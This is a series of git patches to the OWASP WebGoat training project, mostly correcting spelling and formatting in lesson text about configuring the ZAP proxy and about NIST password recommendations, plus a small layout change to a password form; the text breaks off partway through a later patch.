-In the browser type: http://localhost:8080/WebGoat you should see WebGoat and the OWASP ZAP Heads On Display (if you use OWASP ZAP as the proxy):
+In the browser type: http://localhost:8080/WebGoat, you should see WebGoat and the OWASP ZAP Heads On Display (if you use OWASP ZAP as the proxy):
+
+{nbsp} +
 
 image::images/loginscreen.png[Browser with HUD,style="lesson-image"]
 
-You might notice that this is the dutch login screen. This is determined from the language settings from your browser. For some of the pages there will be some local translations. You can contribute to WebGoat and add more for your preferred language.
-You can disable the Heads On Display by clicking on the highlighted button.
-You can learn about the OWASP ZAP HUD on their website. For now it is recommended to disable it as it kind of blocks the menu items.
+{nbsp} +
+
+You might notice that this is the Dutch login screen. The browser determines the language settings. For some pages, there will be some local translations. You can contribute to WebGoat and add more for your preferred language. You can disable the Heads On Display by clicking on the highlighted button. You can learn about the OWASP ZAP HUD on their website. For now, we recommend disabling it as it kind of blocks the menu items.
 
 You should see the following in OWASP ZAP on the history panel:
 
+{nbsp} +
+
 image::images/zap-history.png[ZAP History,style="lesson-image"]
 
-On the next page we will show how you can filter these requests to see only relevant requests and how to configure the interceptor.
-
-
-
-
+{nbsp} +
 
+On the next page, we will show how to filter these requests to see only relevant requests and configure the interceptor.
diff --git a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/5configurefilterandbreakpoints.adoc b/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/5configurefilterandbreakpoints.adoc
index aba7c9342..c642561bb 100644
--- a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/5configurefilterandbreakpoints.adoc
+++ b/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/5configurefilterandbreakpoints.adoc
@@ -1,11 +1,10 @@
-=== Filter requests in history panel
+==== Filter requests in history panel
 
-In the main ZAP window click on Filter, see image below
+In the main ZAP window, click on Filter; see the image below.
 
 image::images/zap-exclude.png[Exclude internal APIs from WebGoat,style="lesson-image"]
 
-{nbsp}
-{nbsp}
+{nbsp} +
 
 Then in the `URL Inc Regex` box type:
 
@@ -21,10 +20,4 @@ And in the `URL Exc Regex` box type:
 .*lesson.*.mvc
 ----
 
-Click 'Apply to close the window, ZAP will now no longer show internal WebGoat requests.
-
-
-
-
-
-
+Click 'Apply to close the window, and ZAP will now no longer show internal WebGoat requests.
diff --git a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/6assignment.adoc b/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/6assignment.adoc
index cb6fa0a43..da3a4a477 100644
--- a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/6assignment.adoc
+++ b/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/6assignment.adoc
@@ -1,30 +1,34 @@
+==== Configure a breakpoint filter
 
-=== Configure a breakpoint filter
-Before we start diving into intercepting requests with ZAP we need to exclude the internal requests from the WebGoat
-framework otherwise ZAP will also stop at all the requests which are only necessary for the internal working of WebGoat.
-Basically a breakpoint is configured that will intercept requests when the request header contains a POST. Which are the most interesting ones. You can add other rules as long as the polling .mvc messages will be excluded. As this would be annoying.
+Before we start diving into intercepting requests with ZAP, we need to exclude the internal requests from the WebGoat
+framework. Otherwise, ZAP will also stop at all the requests which are only necessary for the inner working of WebGoat.
+Basically, a breakpoint is configured that will intercept requests when the request header contains a POST. You can add other rules as long as the polling `.mvc` messages will be excluded. As this would be annoying.
 
 Set the breakpoint as follows:
 
 image::images/breakpoint.png[Set breakpoint,style="lesson-image"]
 
-You can see your active breakpoints here. And if you click on the checkbox you can also temporarily deactivate them and enable them again when you are just about to intercept the request. *DO NOT use the green/red button anymore*
+{nbsp} +
+
+You can see your active breakpoints here. And if you click on the checkbox, you can temporarily deactivate them and enable them again when you are just about to intercept the request. *DO NOT use the green/red button anymore*
 
 image::images/breakpoint2.png[Active breakpoints,style="lesson-image"]
 
+{nbsp} +
+
 Once you are intercepting requests and a request is made, it should look something like this:
 
 image::images/proxy-intercept-details.png[ZAP history tab,style="lesson-image"]
 
-=== Intercept and modify a request
+==== Intercept and modify a request
 
-Set up the intercept as noted above and then submit the form/request below by clicking the submit button. When you request is intercepted (hits the breakpoint),
+Set up the intercept as noted above and then submit the form/request below by clicking the submit button. When your request is intercepted (hits the breakpoint),
 modify it as follows.
 
 * Change the Method to GET
 * Add a header 'x-request-intercepted:true'
-* Remove the request body and instead send 'changeMe' as query string parameter and set the value to 'Requests are tampered easily' (without the single quotes)
+* Remove the request body and instead send 'changeMe' as a query string parameter and set the value to 'Requests are tampered easily' (without the single quotes)
 
 Then let the request continue through (by hitting the play button).
 
-NOTE: The two play buttons behave a little differently, but we'll let you tinker and figure that out for yourself.
\ No newline at end of file
+NOTE: The two play buttons behave a little differently, but we'll let you tinker and figure that out for yourself.
diff --git a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/7resend.adoc b/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/7resend.adoc
index 7a90ef913..0128859a4 100644
--- a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/7resend.adoc
+++ b/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/7resend.adoc
@@ -1,28 +1,29 @@
-=== Use the "Edit and resend" functionality in ZAP
+==== Use the "Edit and resend" functionality in ZAP
 
-Another way to send a request again instead of clicking in WebGoat on a button and intercept the request there is also
-an option to resend the same request again from within ZAP.
-This may significantly help you to solve an assignment because you do not have to switch to ZAP enable the intercept button
-and go back to WebGoat and perform the request again from within the browser.
+Instead of intercepting the request, there is also an option to resend the same request again within ZAP.
+It helps you solve an assignment because you do not have to switch to ZAP, enable the intercept button, go back to WebGoat and perform the request again from within the browser.
 
-Let's look at an example, we are going to use the e-mail example from the WebWolf introduction lesson. This lesson
-will generate a request for `/WebGoat/WebWolf/mail`, in the "History" window select the URL you want to resend right click
+Let's look at an example. We are going to use the e-mail example from the WebWolf introduction lesson. This lesson
+will generate a request for `/WebGoat/WebWolf/mail`, in the "History" window, select the URL you want to resend right click
 on the URL and select `Open/Resend with Request Editor`. You can also find the request in the left pane of ZAP as indicated
 with the red arrow in the image below:
 
 image::images/zap_edit_and_resend.png[Open/Resend with Request Editor,style="lesson-image"]
 
-{nbsp}
+{nbsp} +
 
-A new window will open and here you can modify the request for example change the e-mail address to someone else and send it again.
-In the response tab you can inspect the response of the request. In some assignments the response will show a solved message
-but sometimes you get a code/flag which you need to submit in WebGoat in order to complete the assignment. Always be on the
-lookout for the response. If you solved the assignment by make a request in this way WebGoat will automatically mark
+A new window will open, and here, you can modify the request, for example, change the e-mail address to someone else and send it again.
+In the response tab, you can inspect the response of the request. The response will show a solved message in some assignments, but sometimes you get a code/flag that you need to submit in WebGoat to complete the assignment. Always be on the
+lookout for a response. If you solved the assignment by making a request, WebGoat would automatically mark
 the lesson as solved.
 
 image::images/zap_edit_and_send.png[Open/Resend with Request Editor,style="lesson-image"]
 
-{nbsp}
+{nbsp} +
+
+++++
+<img class="lesson-image" src="images/zap_edit_and_response.png"/>
+++++
 
 image::images/zap_edit_and_response.png[Open/Resend response,style="lesson-image"]
 
diff --git a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/8httpsproxy.adoc b/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/8httpsproxy.adoc
index d16302cbf..192a1953f 100644
--- a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/8httpsproxy.adoc
+++ b/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/8httpsproxy.adoc
@@ -1,14 +1,14 @@
-== Proxy from ZAP to https
+== Proxy from ZAP to HTTPS
 
-The OWASP ZAP proxy can also be configured to proxy *https* requests. It will terminate the https connection in OWASP Zap and then proxy it to the target using its own keystore. You can even proxy to sites with mutual TLS. In that case you configure OWASP ZAP with the keystore and key to use for the connection.
+The ZAP proxy can also be configured to proxy *HTTPS* requests. It will terminate the HTTPS connection in ZAP and then proxy it to the target using its keystore. You can even proxy to sites with mutual TLS. In that case, you configure OWASP ZAP with the keystore and key to use for the connection.
 
-Go to Tools/Options/Client Certificate if you want to proxy to a mutual TLS https site.
+Go to Tools/Options/Client Certificate to proxy to a mutual TLS HTTPS site.
 Go to Tools/Options/Connection if you want to set timeouts and want to force the use of TLSv1.2 e.g.
 
 
 === Export the certificate
 
-Depending on the local installation of tools, ZAP can start a browser directly with some adjusted options like network settings and certificate adjustments. However, this step should be done if you want to start your browser independently of ZAP. To be able to use the browser, the browser needs the certificate, which can be exported here:
+Depending on the local tools installation, ZAP can start a browser directly with some adjusted options like network settings and certificate adjustments. However, you should do this step if you want to start your browser independently of ZAP. To be able to use the browser, the browser needs the certificate, which you can export here:
 
 image::images/rootca.png[ZAP root CA,style="lesson-image"]
 image::images/savecerts.png[ZAP save CA,style="lesson-image"]
@@ -20,8 +20,8 @@ image::images/savecerts.png[ZAP save CA,style="lesson-image"]
 . Go to your Firefox Preferences (Mac, Linux) or Options (Windows) from the menu.`
 . Search for _certificates_
 . Click _View certificates_
-. Import the ZAP root certificate that was saved (see previous page)
+. Import the ZAP root certificate that was saved (see the previous page)
 
 image::images/firefoxsettingscerts.png[Firefox Certificates,width="75%",style="lesson-image"]
 
-image::images/importcerts.png[Firefox Cetificate import,width="75%",style="lesson-image"]
+image::images/importcerts.png[Firefox Certificate import,width="75%",style="lesson-image"]
diff --git a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/9manual.adoc b/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/9manual.adoc
index ae5106ebe..ab087170f 100644
--- a/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/9manual.adoc
+++ b/webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/9manual.adoc
@@ -6,43 +6,43 @@ In the latest release of Chrome and Firefox no longer proxy traffic from localho
 
 === Option 1: Change settings of your browser
 
-- To proxy localhost (and related addresses) with newer Firefox versions (>= 67) the preference network.proxy.allow_hijacking_localhost (accessible through the about:config page) must be set to true.
+- To proxy localhost (and related addresses) with newer Firefox versions (>= 67), the preference network. proxy.allow_hijacking_localhost (accessible through the about:config page) must be set to true.
 - To proxy localhost (and related addresses) with newer Chrome versions (>= 72) the command line argument --proxy-bypass-list=<-loopback> must be provided.
 
 === Option 2: Use www.webgoat.local
 
-- Use the host name of your machine instead of `localhost`, you can find or add a host name in `/etc/hosts` on Linux and MacOSX and `C:\Windows\System32\drivers\etc` on Windows
+- Use the hostname of your machine instead of `localhost`. You can find or add a hostname in `/etc/hosts` on Linux and MacOSX and `C:\Windows\System32\drivers\etc` on Windows
 
 image::images/newlocalhost.png[Hosts file,style="lesson-image"]
 
-Then in your browser use http://www.webgoat.local:8080/WebGoat as the address.
+Then in your browser, use http://www.webgoat.local:8080/WebGoat as the address.
 
 === Configure browser to use proxy
 
-To manually configure a proxy in the browser follow one of the configuration below:
+To manually configure a proxy in the browser, follow one of the configurations below:
 
 ==== Firefox Proxy Config
 
 . Go to your Firefox Preferences (Mac, Linux) or Options (Windows) from the menu.`
 . Select _Advanced_ on the left
-. Select _Network_ in the in Advanced Pane
+. Select _Network_ in the Advanced Pane
 . Click _Settings_
 . Select _Manual proxy configuration_
-.. input *127.0.0.1* as the Proxy (or www.webgoat.local depending on the choice you made above)
-.. input *8090* as the port if running WebGoat locally and you updated ZAP to 8090 (otherwise, use *8080*)
+.. input *127.0.0.1* as the proxy (or www.webgoat.local depending on the choice you made above)
+.. input *8090* as the port if running WebGoat locally, and you updated ZAP to 8090 (otherwise, use *8080*)
 .. check the _Use this proxy server for all protocols_ checkbox
 
 image::images/firefox-proxy-config.png[Firefox Proxy Config,510,634,style="lesson-image"]
 
 ==== Chrome Proxy Config
 
-. Bring up Chrome's settings form the menu
-. In the _Search settings_ box type in *proxy* and hit Enter/Return. This should bring up the Network heading with a _Change proxy settings_ button.
+. Bring up Chrome's settings from the menu
+. In the _Search settings_ box, type in *proxy* and hit Enter/Return. This should bring up the Network heading with a _Change proxy settings_ button.
 . Click the _Change proxy settings_ button
 . Select the _proxies_ tab
 . Select Web Proxy (HTTP)
-. Input 127.0.0.1 (or www.webgoatl.local depending on the choice you made) in the first box under _Web Proxy Server_ and your port # (8090 if running WebGoat locally, otherwise 8080) in the second box (to the right)
-. You may also want to clear the _Bypass proxy settings for these Hosts & Domains_ text input at the bottom, but shouldn't need to
+. Input 127.0.0.1 (or www.webgoat.local depending on the choice you made) in the first box under _Web Proxy Server_ and your port # (8090 if running WebGoat locally, otherwise 8080) in the second box (to the right)
+. You may also want to clear the _Bypass proxy settings for these Hosts & Domains_ text input at the bottom but shouldn't need to
 
 
 image::images/chrome-manual-proxy.png[Chrome Proxy Config,700,447,style="lesson-image"]

From b23b4287633195710c366d86efade5bf04b68e1e Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Mon, 15 Nov 2021 21:39:32 +0100
Subject: [PATCH 096/227] Fix spelling/grammar

Resolves: #1143
---
 .../lessonPlans/en/SecurePasswords_1.adoc     |  6 ++-
 .../lessonPlans/en/SecurePasswords_2.adoc     | 48 +++++++++----------
 .../lessonPlans/en/SecurePasswords_3.adoc     | 24 +++++-----
 .../lessonPlans/en/SecurePasswords_4.adoc     | 45 +++++++++--------
 ...curePasswords_assignment_introduction.adoc |  6 +--
 .../lessonPlans/en/SecurePasswords_intro.adoc |  7 ++-
 6 files changed, 67 insertions(+), 69 deletions(-)

diff --git a/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_1.adoc b/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_1.adoc
index ca61d8c47..fa8c7d095 100644
--- a/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_1.adoc
+++ b/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_1.adoc
@@ -1,8 +1,10 @@
-== National Institute of Standards and Technology (NIST)
+=== National Institute of Standards and Technology (NIST)
+
 The National Institute of Standards and Technology (NIST) is a non-regulatory federal agency within the U.S. Department of Commerce.
+
 Its mission is to promote U.S. innovation and industrial competitiveness by advancing measurement science, standards, and technology in ways that enhance economic security and improve our quality of life.
 
-NIST develops Federal Information Processing Standards (FIPS) which the Secretary of Commerce approves and with which federal agencies must comply.
+NIST develops Federal Information Processing Standards (FIPS), which the Secretary of Commerce approves and federal agencies must comply with.
 
 NIST also provides guidance documents and recommendations through its Special Publications (SP) 800-series.
 These guidelines often become the foundation for best practice recommendations across the security industry and are incorporated into other standards.
diff --git a/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_2.adoc b/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_2.adoc
index 3abc649f8..695a4daea 100644
--- a/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_2.adoc
+++ b/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_2.adoc
@@ -1,42 +1,40 @@
-== NIST password standard
+=== NIST password standard
 
 The NIST password standard (also known as the https://pages.nist.gov/800-63-3/sp800-63b.html[Special Publications (SP) 800-series]) is a guideline that provides recommendations for implementing secure password systems.
 
-=== Password rules
+==== Password rules
 Here are some of the most important recommendations made by the most recent NIST standard:
 
 - *no composition rules* +
-  Do not request the user to e.g. use at least one upper case letter and a special character on their password.
-  Give them the opportunity to, but do not force them!
+Do not request the user to, e.g., use at least one upper case letter and a special character on their password.
+Please give them the opportunity to, but do not force them!
 - *no password hints* +
-  If you wanted people have a better chance at guessing your password, write it on a note attached to your screen.
+If you wanted people to have a better chance at guessing your password, write it on a note attached to your screen.
 - *no security questions* +
-  Security questions, also known as knowledge-based authentication (KBA) are outdated.
-  Asking a user “What’s the name of your pet?” or something similar to check if it’s really him, is pretty unsecure.
+Security questions, also known as knowledge-based authentication (KBA), are outdated.
+Asking a user, "What's the name of your pet?" or something similar to check if it's him is pretty insecure.
 - *no unnecessary changing of passwords*
-  If you want users to comply and choose long, hard-to-guess passwords, you should not make them change those passwords unnecessarily after a certain period of time.
+If you want users to comply and choose long, hard-to-guess passwords, you should not make them change those passwords unnecessarily after a certain period.
 - *minimum size of 8 characters* +
-  A secure password nowadays should be at LEAST 8 characters long (up to 64).
-  This is a minimum, not a maximum minimum!
+A secure password nowadays should be at LEAST 8 characters long (up to 64).
+This is a minimum, not a maximum-minimum!
 - *support all UNICODE characters* +
-  You should allow all kind of UNICODE characters in a password.
-  This also includes emojis and whitespaces.
-- *strength meter* +
-  Add a strength meter on the password creation page to help the user to choose a strong and secure password.
+It would help if you allowed all kinds of UNICODE characters in a password.
+This also includes emojis and whitespaces.
 - *check the password against known bad choices*
-  * passwords obtained from previous breach corpuses
-  * dictionary words
-  * repetitive or sequential characters (e.g. ‘aaaaaa’, ‘1234abcd’)
-  * context-specific words, such as the name of the service, the username, and derivatives thereof
+* passwords obtained from previous breach corpuses
+* dictionary words
+* repetitive or sequential characters (e.g. 'aaaaaa', '1234abcd')
+* context-specific words, such as the name of the service, the username, and derivatives thereof
 
-=== Usability
+==== Usability
 
-Besides the recommendations above, the NIST standard also recommends to increase the usability of password forms to increase the likelihood of users choosing a strong and secure password. Some of those are:
+Besides the recommendations above, the NIST standard also recommends increasing the usability of password forms to increase the likelihood of users choosing a strong and secure password. Some of those are:
 
 - *allow pasting into the password input* +
-  Users should be able to use the "paste" functionality when entering a password.
-  Since this facilitates the use of password managers, it also increases the likelihood that the user will choose a strong password.
-- *allow to display the password* +
-  Password inputs should have an option to display the entered password to assist the user in successfully entering a password.
+Users should be able to use the "paste" functionality when entering a password.
+Since this facilitates the use of password managers, it also increases the likelihood that the user will choose a strong password.
+- *allow displaying the password* +
+Password inputs should have an option to display the entered password to assist the user in successfully entering a password.
 - *offer a strength meter* +
-  Add a strength meter on the password creation page to help the user to choose a strong and secure password.
\ No newline at end of file
+Add a strength meter on the password creation page to help the user choose a strong and secure password.
diff --git a/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_3.adoc b/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_3.adoc
index 128fbb710..513cb7662 100644
--- a/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_3.adoc
+++ b/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_3.adoc
@@ -1,19 +1,19 @@
-== Are your passwords secure?
+=== Are your passwords secure?
 
 What about you? Are your passwords secure?
 
-There are websites that allow to test if one of your accounts got breached in a past data breach. +
+There are dedicated websites that allow searching if one of your accounts got breached in a past data breach. +
 Go to https://haveibeenpwned.com/Passwords[Have I Been Pwned] or https://www.dehashed.com/[DEHASHED] per example and test if your account got breached.
 If so, better change your passwords *right now*!
 
-=== What can you do to improve security of your account?
+==== What can you do to improve the security of your account?
 - *use different passwords for different accounts* +
-  It is a good thing to NOT use the same password for multiple accounts but rather to use different passwords for each one.
-  * *use passphrases* +
-  Use passphrase generators like https://www.rempe.us/diceware/#eff[Diceware] to generate passphrases.
-  Passphrases are passwords made out of a number of words instead of randomly generated character sequences.
-  This makes them way easier to remember for us human beings. And by the way: The longer the better!
-  * *use a password manager* +
-  If you can't remember all of your different passwords, use a password manager to create an then securely store your passwords.
-- *use two factor authentication* +
-  If possible, use two factor authentication methods to add an extra layer of security to your accounts.
\ No newline at end of file
+It is a good thing NOT to use the same password for multiple accounts but rather to use different passwords.
+* *use passphrases* +
+Use passphrase generators like https://www.rempe.us/diceware/#eff[Diceware] to generate passphrases.
+Passphrases are passwords made out of several words instead of randomly generated character sequences.
+This makes them way easier to remember for us human beings. And by the way: The longer, the better!
+* *use a password manager* +
+If you can't remember your different passwords, use a password manager to create and securely store your passwords.
+- *use two-factor authentication* +
+If possible, use two-factor authentication methods to add an extra layer of security to your accounts.
diff --git a/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_4.adoc b/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_4.adoc
index 5b2523689..559198abc 100644
--- a/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_4.adoc
+++ b/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_4.adoc
@@ -1,33 +1,32 @@
-== Storing passwords
+=== Storing passwords
 
-After a strong and secure password was created, it also has to be stored in a secure way.
+After a strong and secure password was created, it also has to be stored securely.
 The NIST gives recommendations on how applications should handle passwords and how to store them securely.
 
-=== How should a password be stored?
+==== How should a password be stored?
 
 - first of all: *use encryption and a protected channel for requesting passwords* +
-  The verifier shall use approved encryption and an authenticated protected channel when requesting memorized secrets
-  in order to provide resistance to eavesdropping and MitM (Man-in-the-middle) attacks.
+The verifier shall use approved encryption and an authenticated protected channel to resist eavesdropping and MitM (Man-in-the-middle) attacks when requesting memorized secrets.
 - *resistant to offline attacks* +
-  Passwords should be stored in a form that is resistant to offline attacks.
+Passwords should be stored in a form that is resistant to offline attacks.
 - *use salts* +
-  Passwords should be salted before storing them.
-  The salt shall have at least 32 bits in length and should be chosen arbitrarily so as to minimize salt value collisions among stored hashes.
+Passwords should be salted before storing them.
+The salt shall have at least 32 bits in length and should be chosen arbitrarily to minimize salt value collisions among stored hashes.
 - *use hashing* +
-  Before storing a password it should be hashed with a one way key derivation function.
-  The function takes the password, the salt and a cost factor as inputs and then generates a password hash. +
-  Examples of suitable key derivation functions:
-  * Password-based Key Derivation Function 2 (https://pages.nist.gov/800-63-3/sp800-63b.html#SP800-132[PBKDF2]) (as large as possible => at least 10.000 iterations)
-  * https://pages.nist.gov/800-63-3/sp800-63b.html#SP800-132[BALLOON]
-  * The key derivation function shall use an approved one-way function such as:
-    ** Keyed Hash Message Authentication Code (https://pages.nist.gov/800-63-3/sp800-63b.html#FIPS198-1[HMAC])
-    ** any approved hash function in https://pages.nist.gov/800-63-3/sp800-63b.html#SP800-107[SP 800-107]
-    ** Secure Hash Algorithm 3 (https://pages.nist.gov/800-63-3/sp800-63b.html#FIPS202[SHA-3])
-    ** https://pages.nist.gov/800-63-3/sp800-63b.html#SP800-38B[CMAC]
-    ** Keccak Message Authentication Code (KMAC)
-    ** Customizable SHAKE (cSHAKE)
-    ** https://pages.nist.gov/800-63-3/sp800-63b.html#SP800-185[ParallelHash]
+Before storing a password, it should be hashed with a one-way key derivation function.
+The function inputs the password, salt, and cost factor and then generates a password hash. +
+Examples of suitable key derivation functions:
+* Password-based Key Derivation Function 2 (https://pages.nist.gov/800-63-3/sp800-63b.html#SP800-132[PBKDF2]) (as large as possible => at least 10.000 iterations)
+* https://pages.nist.gov/800-63-3/sp800-63b.html#SP800-132[BALLOON]
+* The key derivation function shall use an approved one-way function such as:
+** Keyed Hash Message Authentication Code (https://pages.nist.gov/800-63-3/sp800-63b.html#FIPS198-1[HMAC])
+** any approved hash function in https://pages.nist.gov/800-63-3/sp800-63b.html#SP800-107[SP 800-107]
+** Secure Hash Algorithm 3 (https://pages.nist.gov/800-63-3/sp800-63b.html#FIPS202[SHA-3])
+** https://pages.nist.gov/800-63-3/sp800-63b.html#SP800-38B[CMAC]
+** Keccak Message Authentication Code (KMAC)
+** Customizable SHAKE (cSHAKE)
+** https://pages.nist.gov/800-63-3/sp800-63b.html#SP800-185[ParallelHash]
 - *memory hard key derivation function* +
-  Use memory hard key derivation functions to further increase the needed cost to perform attacks.
+Use memory-hard key derivation functions to increase the needed cost further to perform attacks.
 - *high cost factor* +
-  The cost factor (iteration count) of the key derivation function should be as large as verification server performance will allow. (at least 10.000 iterations)
\ No newline at end of file
+The key derivation function's cost factor (iteration count) should be as large as verification server performance will allow. (at least 10.000 iterations)
diff --git a/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_assignment_introduction.adoc b/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_assignment_introduction.adoc
index 705f8e94b..346459a95 100644
--- a/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_assignment_introduction.adoc
+++ b/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_assignment_introduction.adoc
@@ -1,8 +1,8 @@
-== How long could it take to brute force your password?
+=== How long could it take to brute force your password?
 
-In this assignment you have to type in a password which is strong enough (at least 4/4).
+In this assignment, you have to type in a password that is strong enough (at least 4/4).
 
-After you finished this assignment we highly recommend you to try some of the passwords below to see why they are no good choices:
+After you finish this assignment we highly recommend you try some passwords below to see why they are not good choices:
 
 * password
 * johnsmith
diff --git a/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_intro.adoc b/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_intro.adoc
index be98460a6..3b35c456f 100644
--- a/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_intro.adoc
+++ b/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_intro.adoc
@@ -1,8 +1,7 @@
-== Secure Passwords
-In this lesson the user will learn about how to create strong passwords and how to store them in a secure way.
-We will take a look at most important recommendations made by the NIST password standard.
+In this lesson, the user will learn how to create strong passwords and securely store them.
+We will take a look at the most important recommendations made by the NIST password standard.
 
 Goals:
 
 - The user knows how a strong password should look like and what specifications it should fulfill
-- The user has a basic overview of what to pay attention to when developing an application that stores passwords
\ No newline at end of file
+- The user has a basic overview of what to pay attention to when developing an application that stores passwords

From f13632578dd15942fedc40ec29d58c94752415de Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Mon, 15 Nov 2021 21:40:48 +0100
Subject: [PATCH 097/227] Fix layout of assignment and remove duplicate
 feedback

Resolves: #1143
---
 .../SecurePasswordsAssignment.java            |  1 -
 .../main/resources/html/SecurePasswords.html  | 36 +++++++++----------
 2 files changed, 18 insertions(+), 19 deletions(-)

diff --git a/webgoat-lessons/secure-passwords/src/main/java/org/owasp/webgoat/secure_password/SecurePasswordsAssignment.java b/webgoat-lessons/secure-passwords/src/main/java/org/owasp/webgoat/secure_password/SecurePasswordsAssignment.java
index ed8d0d3a1..d484ce8e7 100644
--- a/webgoat-lessons/secure-passwords/src/main/java/org/owasp/webgoat/secure_password/SecurePasswordsAssignment.java
+++ b/webgoat-lessons/secure-passwords/src/main/java/org/owasp/webgoat/secure_password/SecurePasswordsAssignment.java
@@ -69,7 +69,6 @@ public class SecurePasswordsAssignment extends AssignmentEndpoint {
             output.append("</ul></br>");
         }
         output.append("<b>Score: </b>" + strength.getScore() + "/4 </br>");
-        output.append("<b>Estimated cracking time in seconds: </b>" + calculateTime((long) strength.getCrackTimeSeconds().getOnlineNoThrottling10perSecond()));
 
         if (strength.getScore() >= 4)
             return success(this).feedback("securepassword-success").output(output.toString()).build();
diff --git a/webgoat-lessons/secure-passwords/src/main/resources/html/SecurePasswords.html b/webgoat-lessons/secure-passwords/src/main/resources/html/SecurePasswords.html
index e718bf2c7..27c1e076b 100644
--- a/webgoat-lessons/secure-passwords/src/main/resources/html/SecurePasswords.html
+++ b/webgoat-lessons/secure-passwords/src/main/resources/html/SecurePasswords.html
@@ -22,16 +22,16 @@
               method="POST" name="form"
               action="/WebGoat/SecurePasswords/assignment"
               autocomplete="off">
-            <table>
-                <tr>
-                    <td><label>Password</label></td>
-                    <td><input id="myInput" name="password" value="" type="password" placeholder="Enter a secure password"/></td>
-                    <td><input type="checkbox" onclick="javascript:myFunction()"/>Show password</td>
-                </tr>
-                <tr>
-                    <td><button type="SUBMIT">Submit</button></td>
-                </tr>
-            </table>
+
+            <div class="input-group input-group">
+                <input id="myInput" name="password" value="" type="password" class="form-control"
+                       placeholder="Enter a secure password..."
+                       aria-describedby="password-label">
+                <span class="input-group-addon"><input type="checkbox" onclick="javascript:myFunction()"/> Show password</span>
+            </div>
+            <div class="input-group" style="margin-top: 10px">
+                <button type="submit" class="btn btn-primary">Submit</button>
+            </div>
         </form>
         <div class="attack-feedback"></div>
         <div class="attack-output"></div>
@@ -47,14 +47,14 @@
 </div>
 
 <script>
-function myFunction() {
-  var x = document.getElementById("myInput");
-  if (x.type === "password") {
-    x.type = "text";
-  } else {
-    x.type = "password";
-  }
-}
+    function myFunction() {
+        var x = document.getElementById("myInput");
+        if (x.type === "password") {
+            x.type = "text";
+        } else {
+            x.type = "password";
+        }
+    }
 </script>
 
 

From fc6b0f28df085caea862cd83bddd264fa138eae0 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Tue, 16 Nov 2021 14:48:21 +0100
Subject: [PATCH 098/227] Add endpoint for the JavaScript to post to

The JavaScript posts to a random endpoint resulting in a HTTP/405 we now post to an existing endpoint.

Resolves: #1142
---
 .../insecure_login/InsecureLoginTask.java        | 16 +++++++++++-----
 .../src/main/resources/js/credentials.js         |  2 +-
 .../lessonPlans/en/InsecureLogin_Intro.adoc      |  6 +++---
 .../lessonPlans/en/InsecureLogin_Task.adoc       |  4 ++--
 4 files changed, 17 insertions(+), 11 deletions(-)

diff --git a/webgoat-lessons/insecure-login/src/main/java/org/owasp/webgoat/insecure_login/InsecureLoginTask.java b/webgoat-lessons/insecure-login/src/main/java/org/owasp/webgoat/insecure_login/InsecureLoginTask.java
index 10cb2bc72..2e9b7a26d 100644
--- a/webgoat-lessons/insecure-login/src/main/java/org/owasp/webgoat/insecure_login/InsecureLoginTask.java
+++ b/webgoat-lessons/insecure-login/src/main/java/org/owasp/webgoat/insecure_login/InsecureLoginTask.java
@@ -24,10 +24,10 @@ package org.owasp.webgoat.insecure_login;
 
 import org.owasp.webgoat.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.assignments.AttackResult;
-import org.springframework.web.bind.annotation.PostMapping;
-import org.springframework.web.bind.annotation.RequestParam;
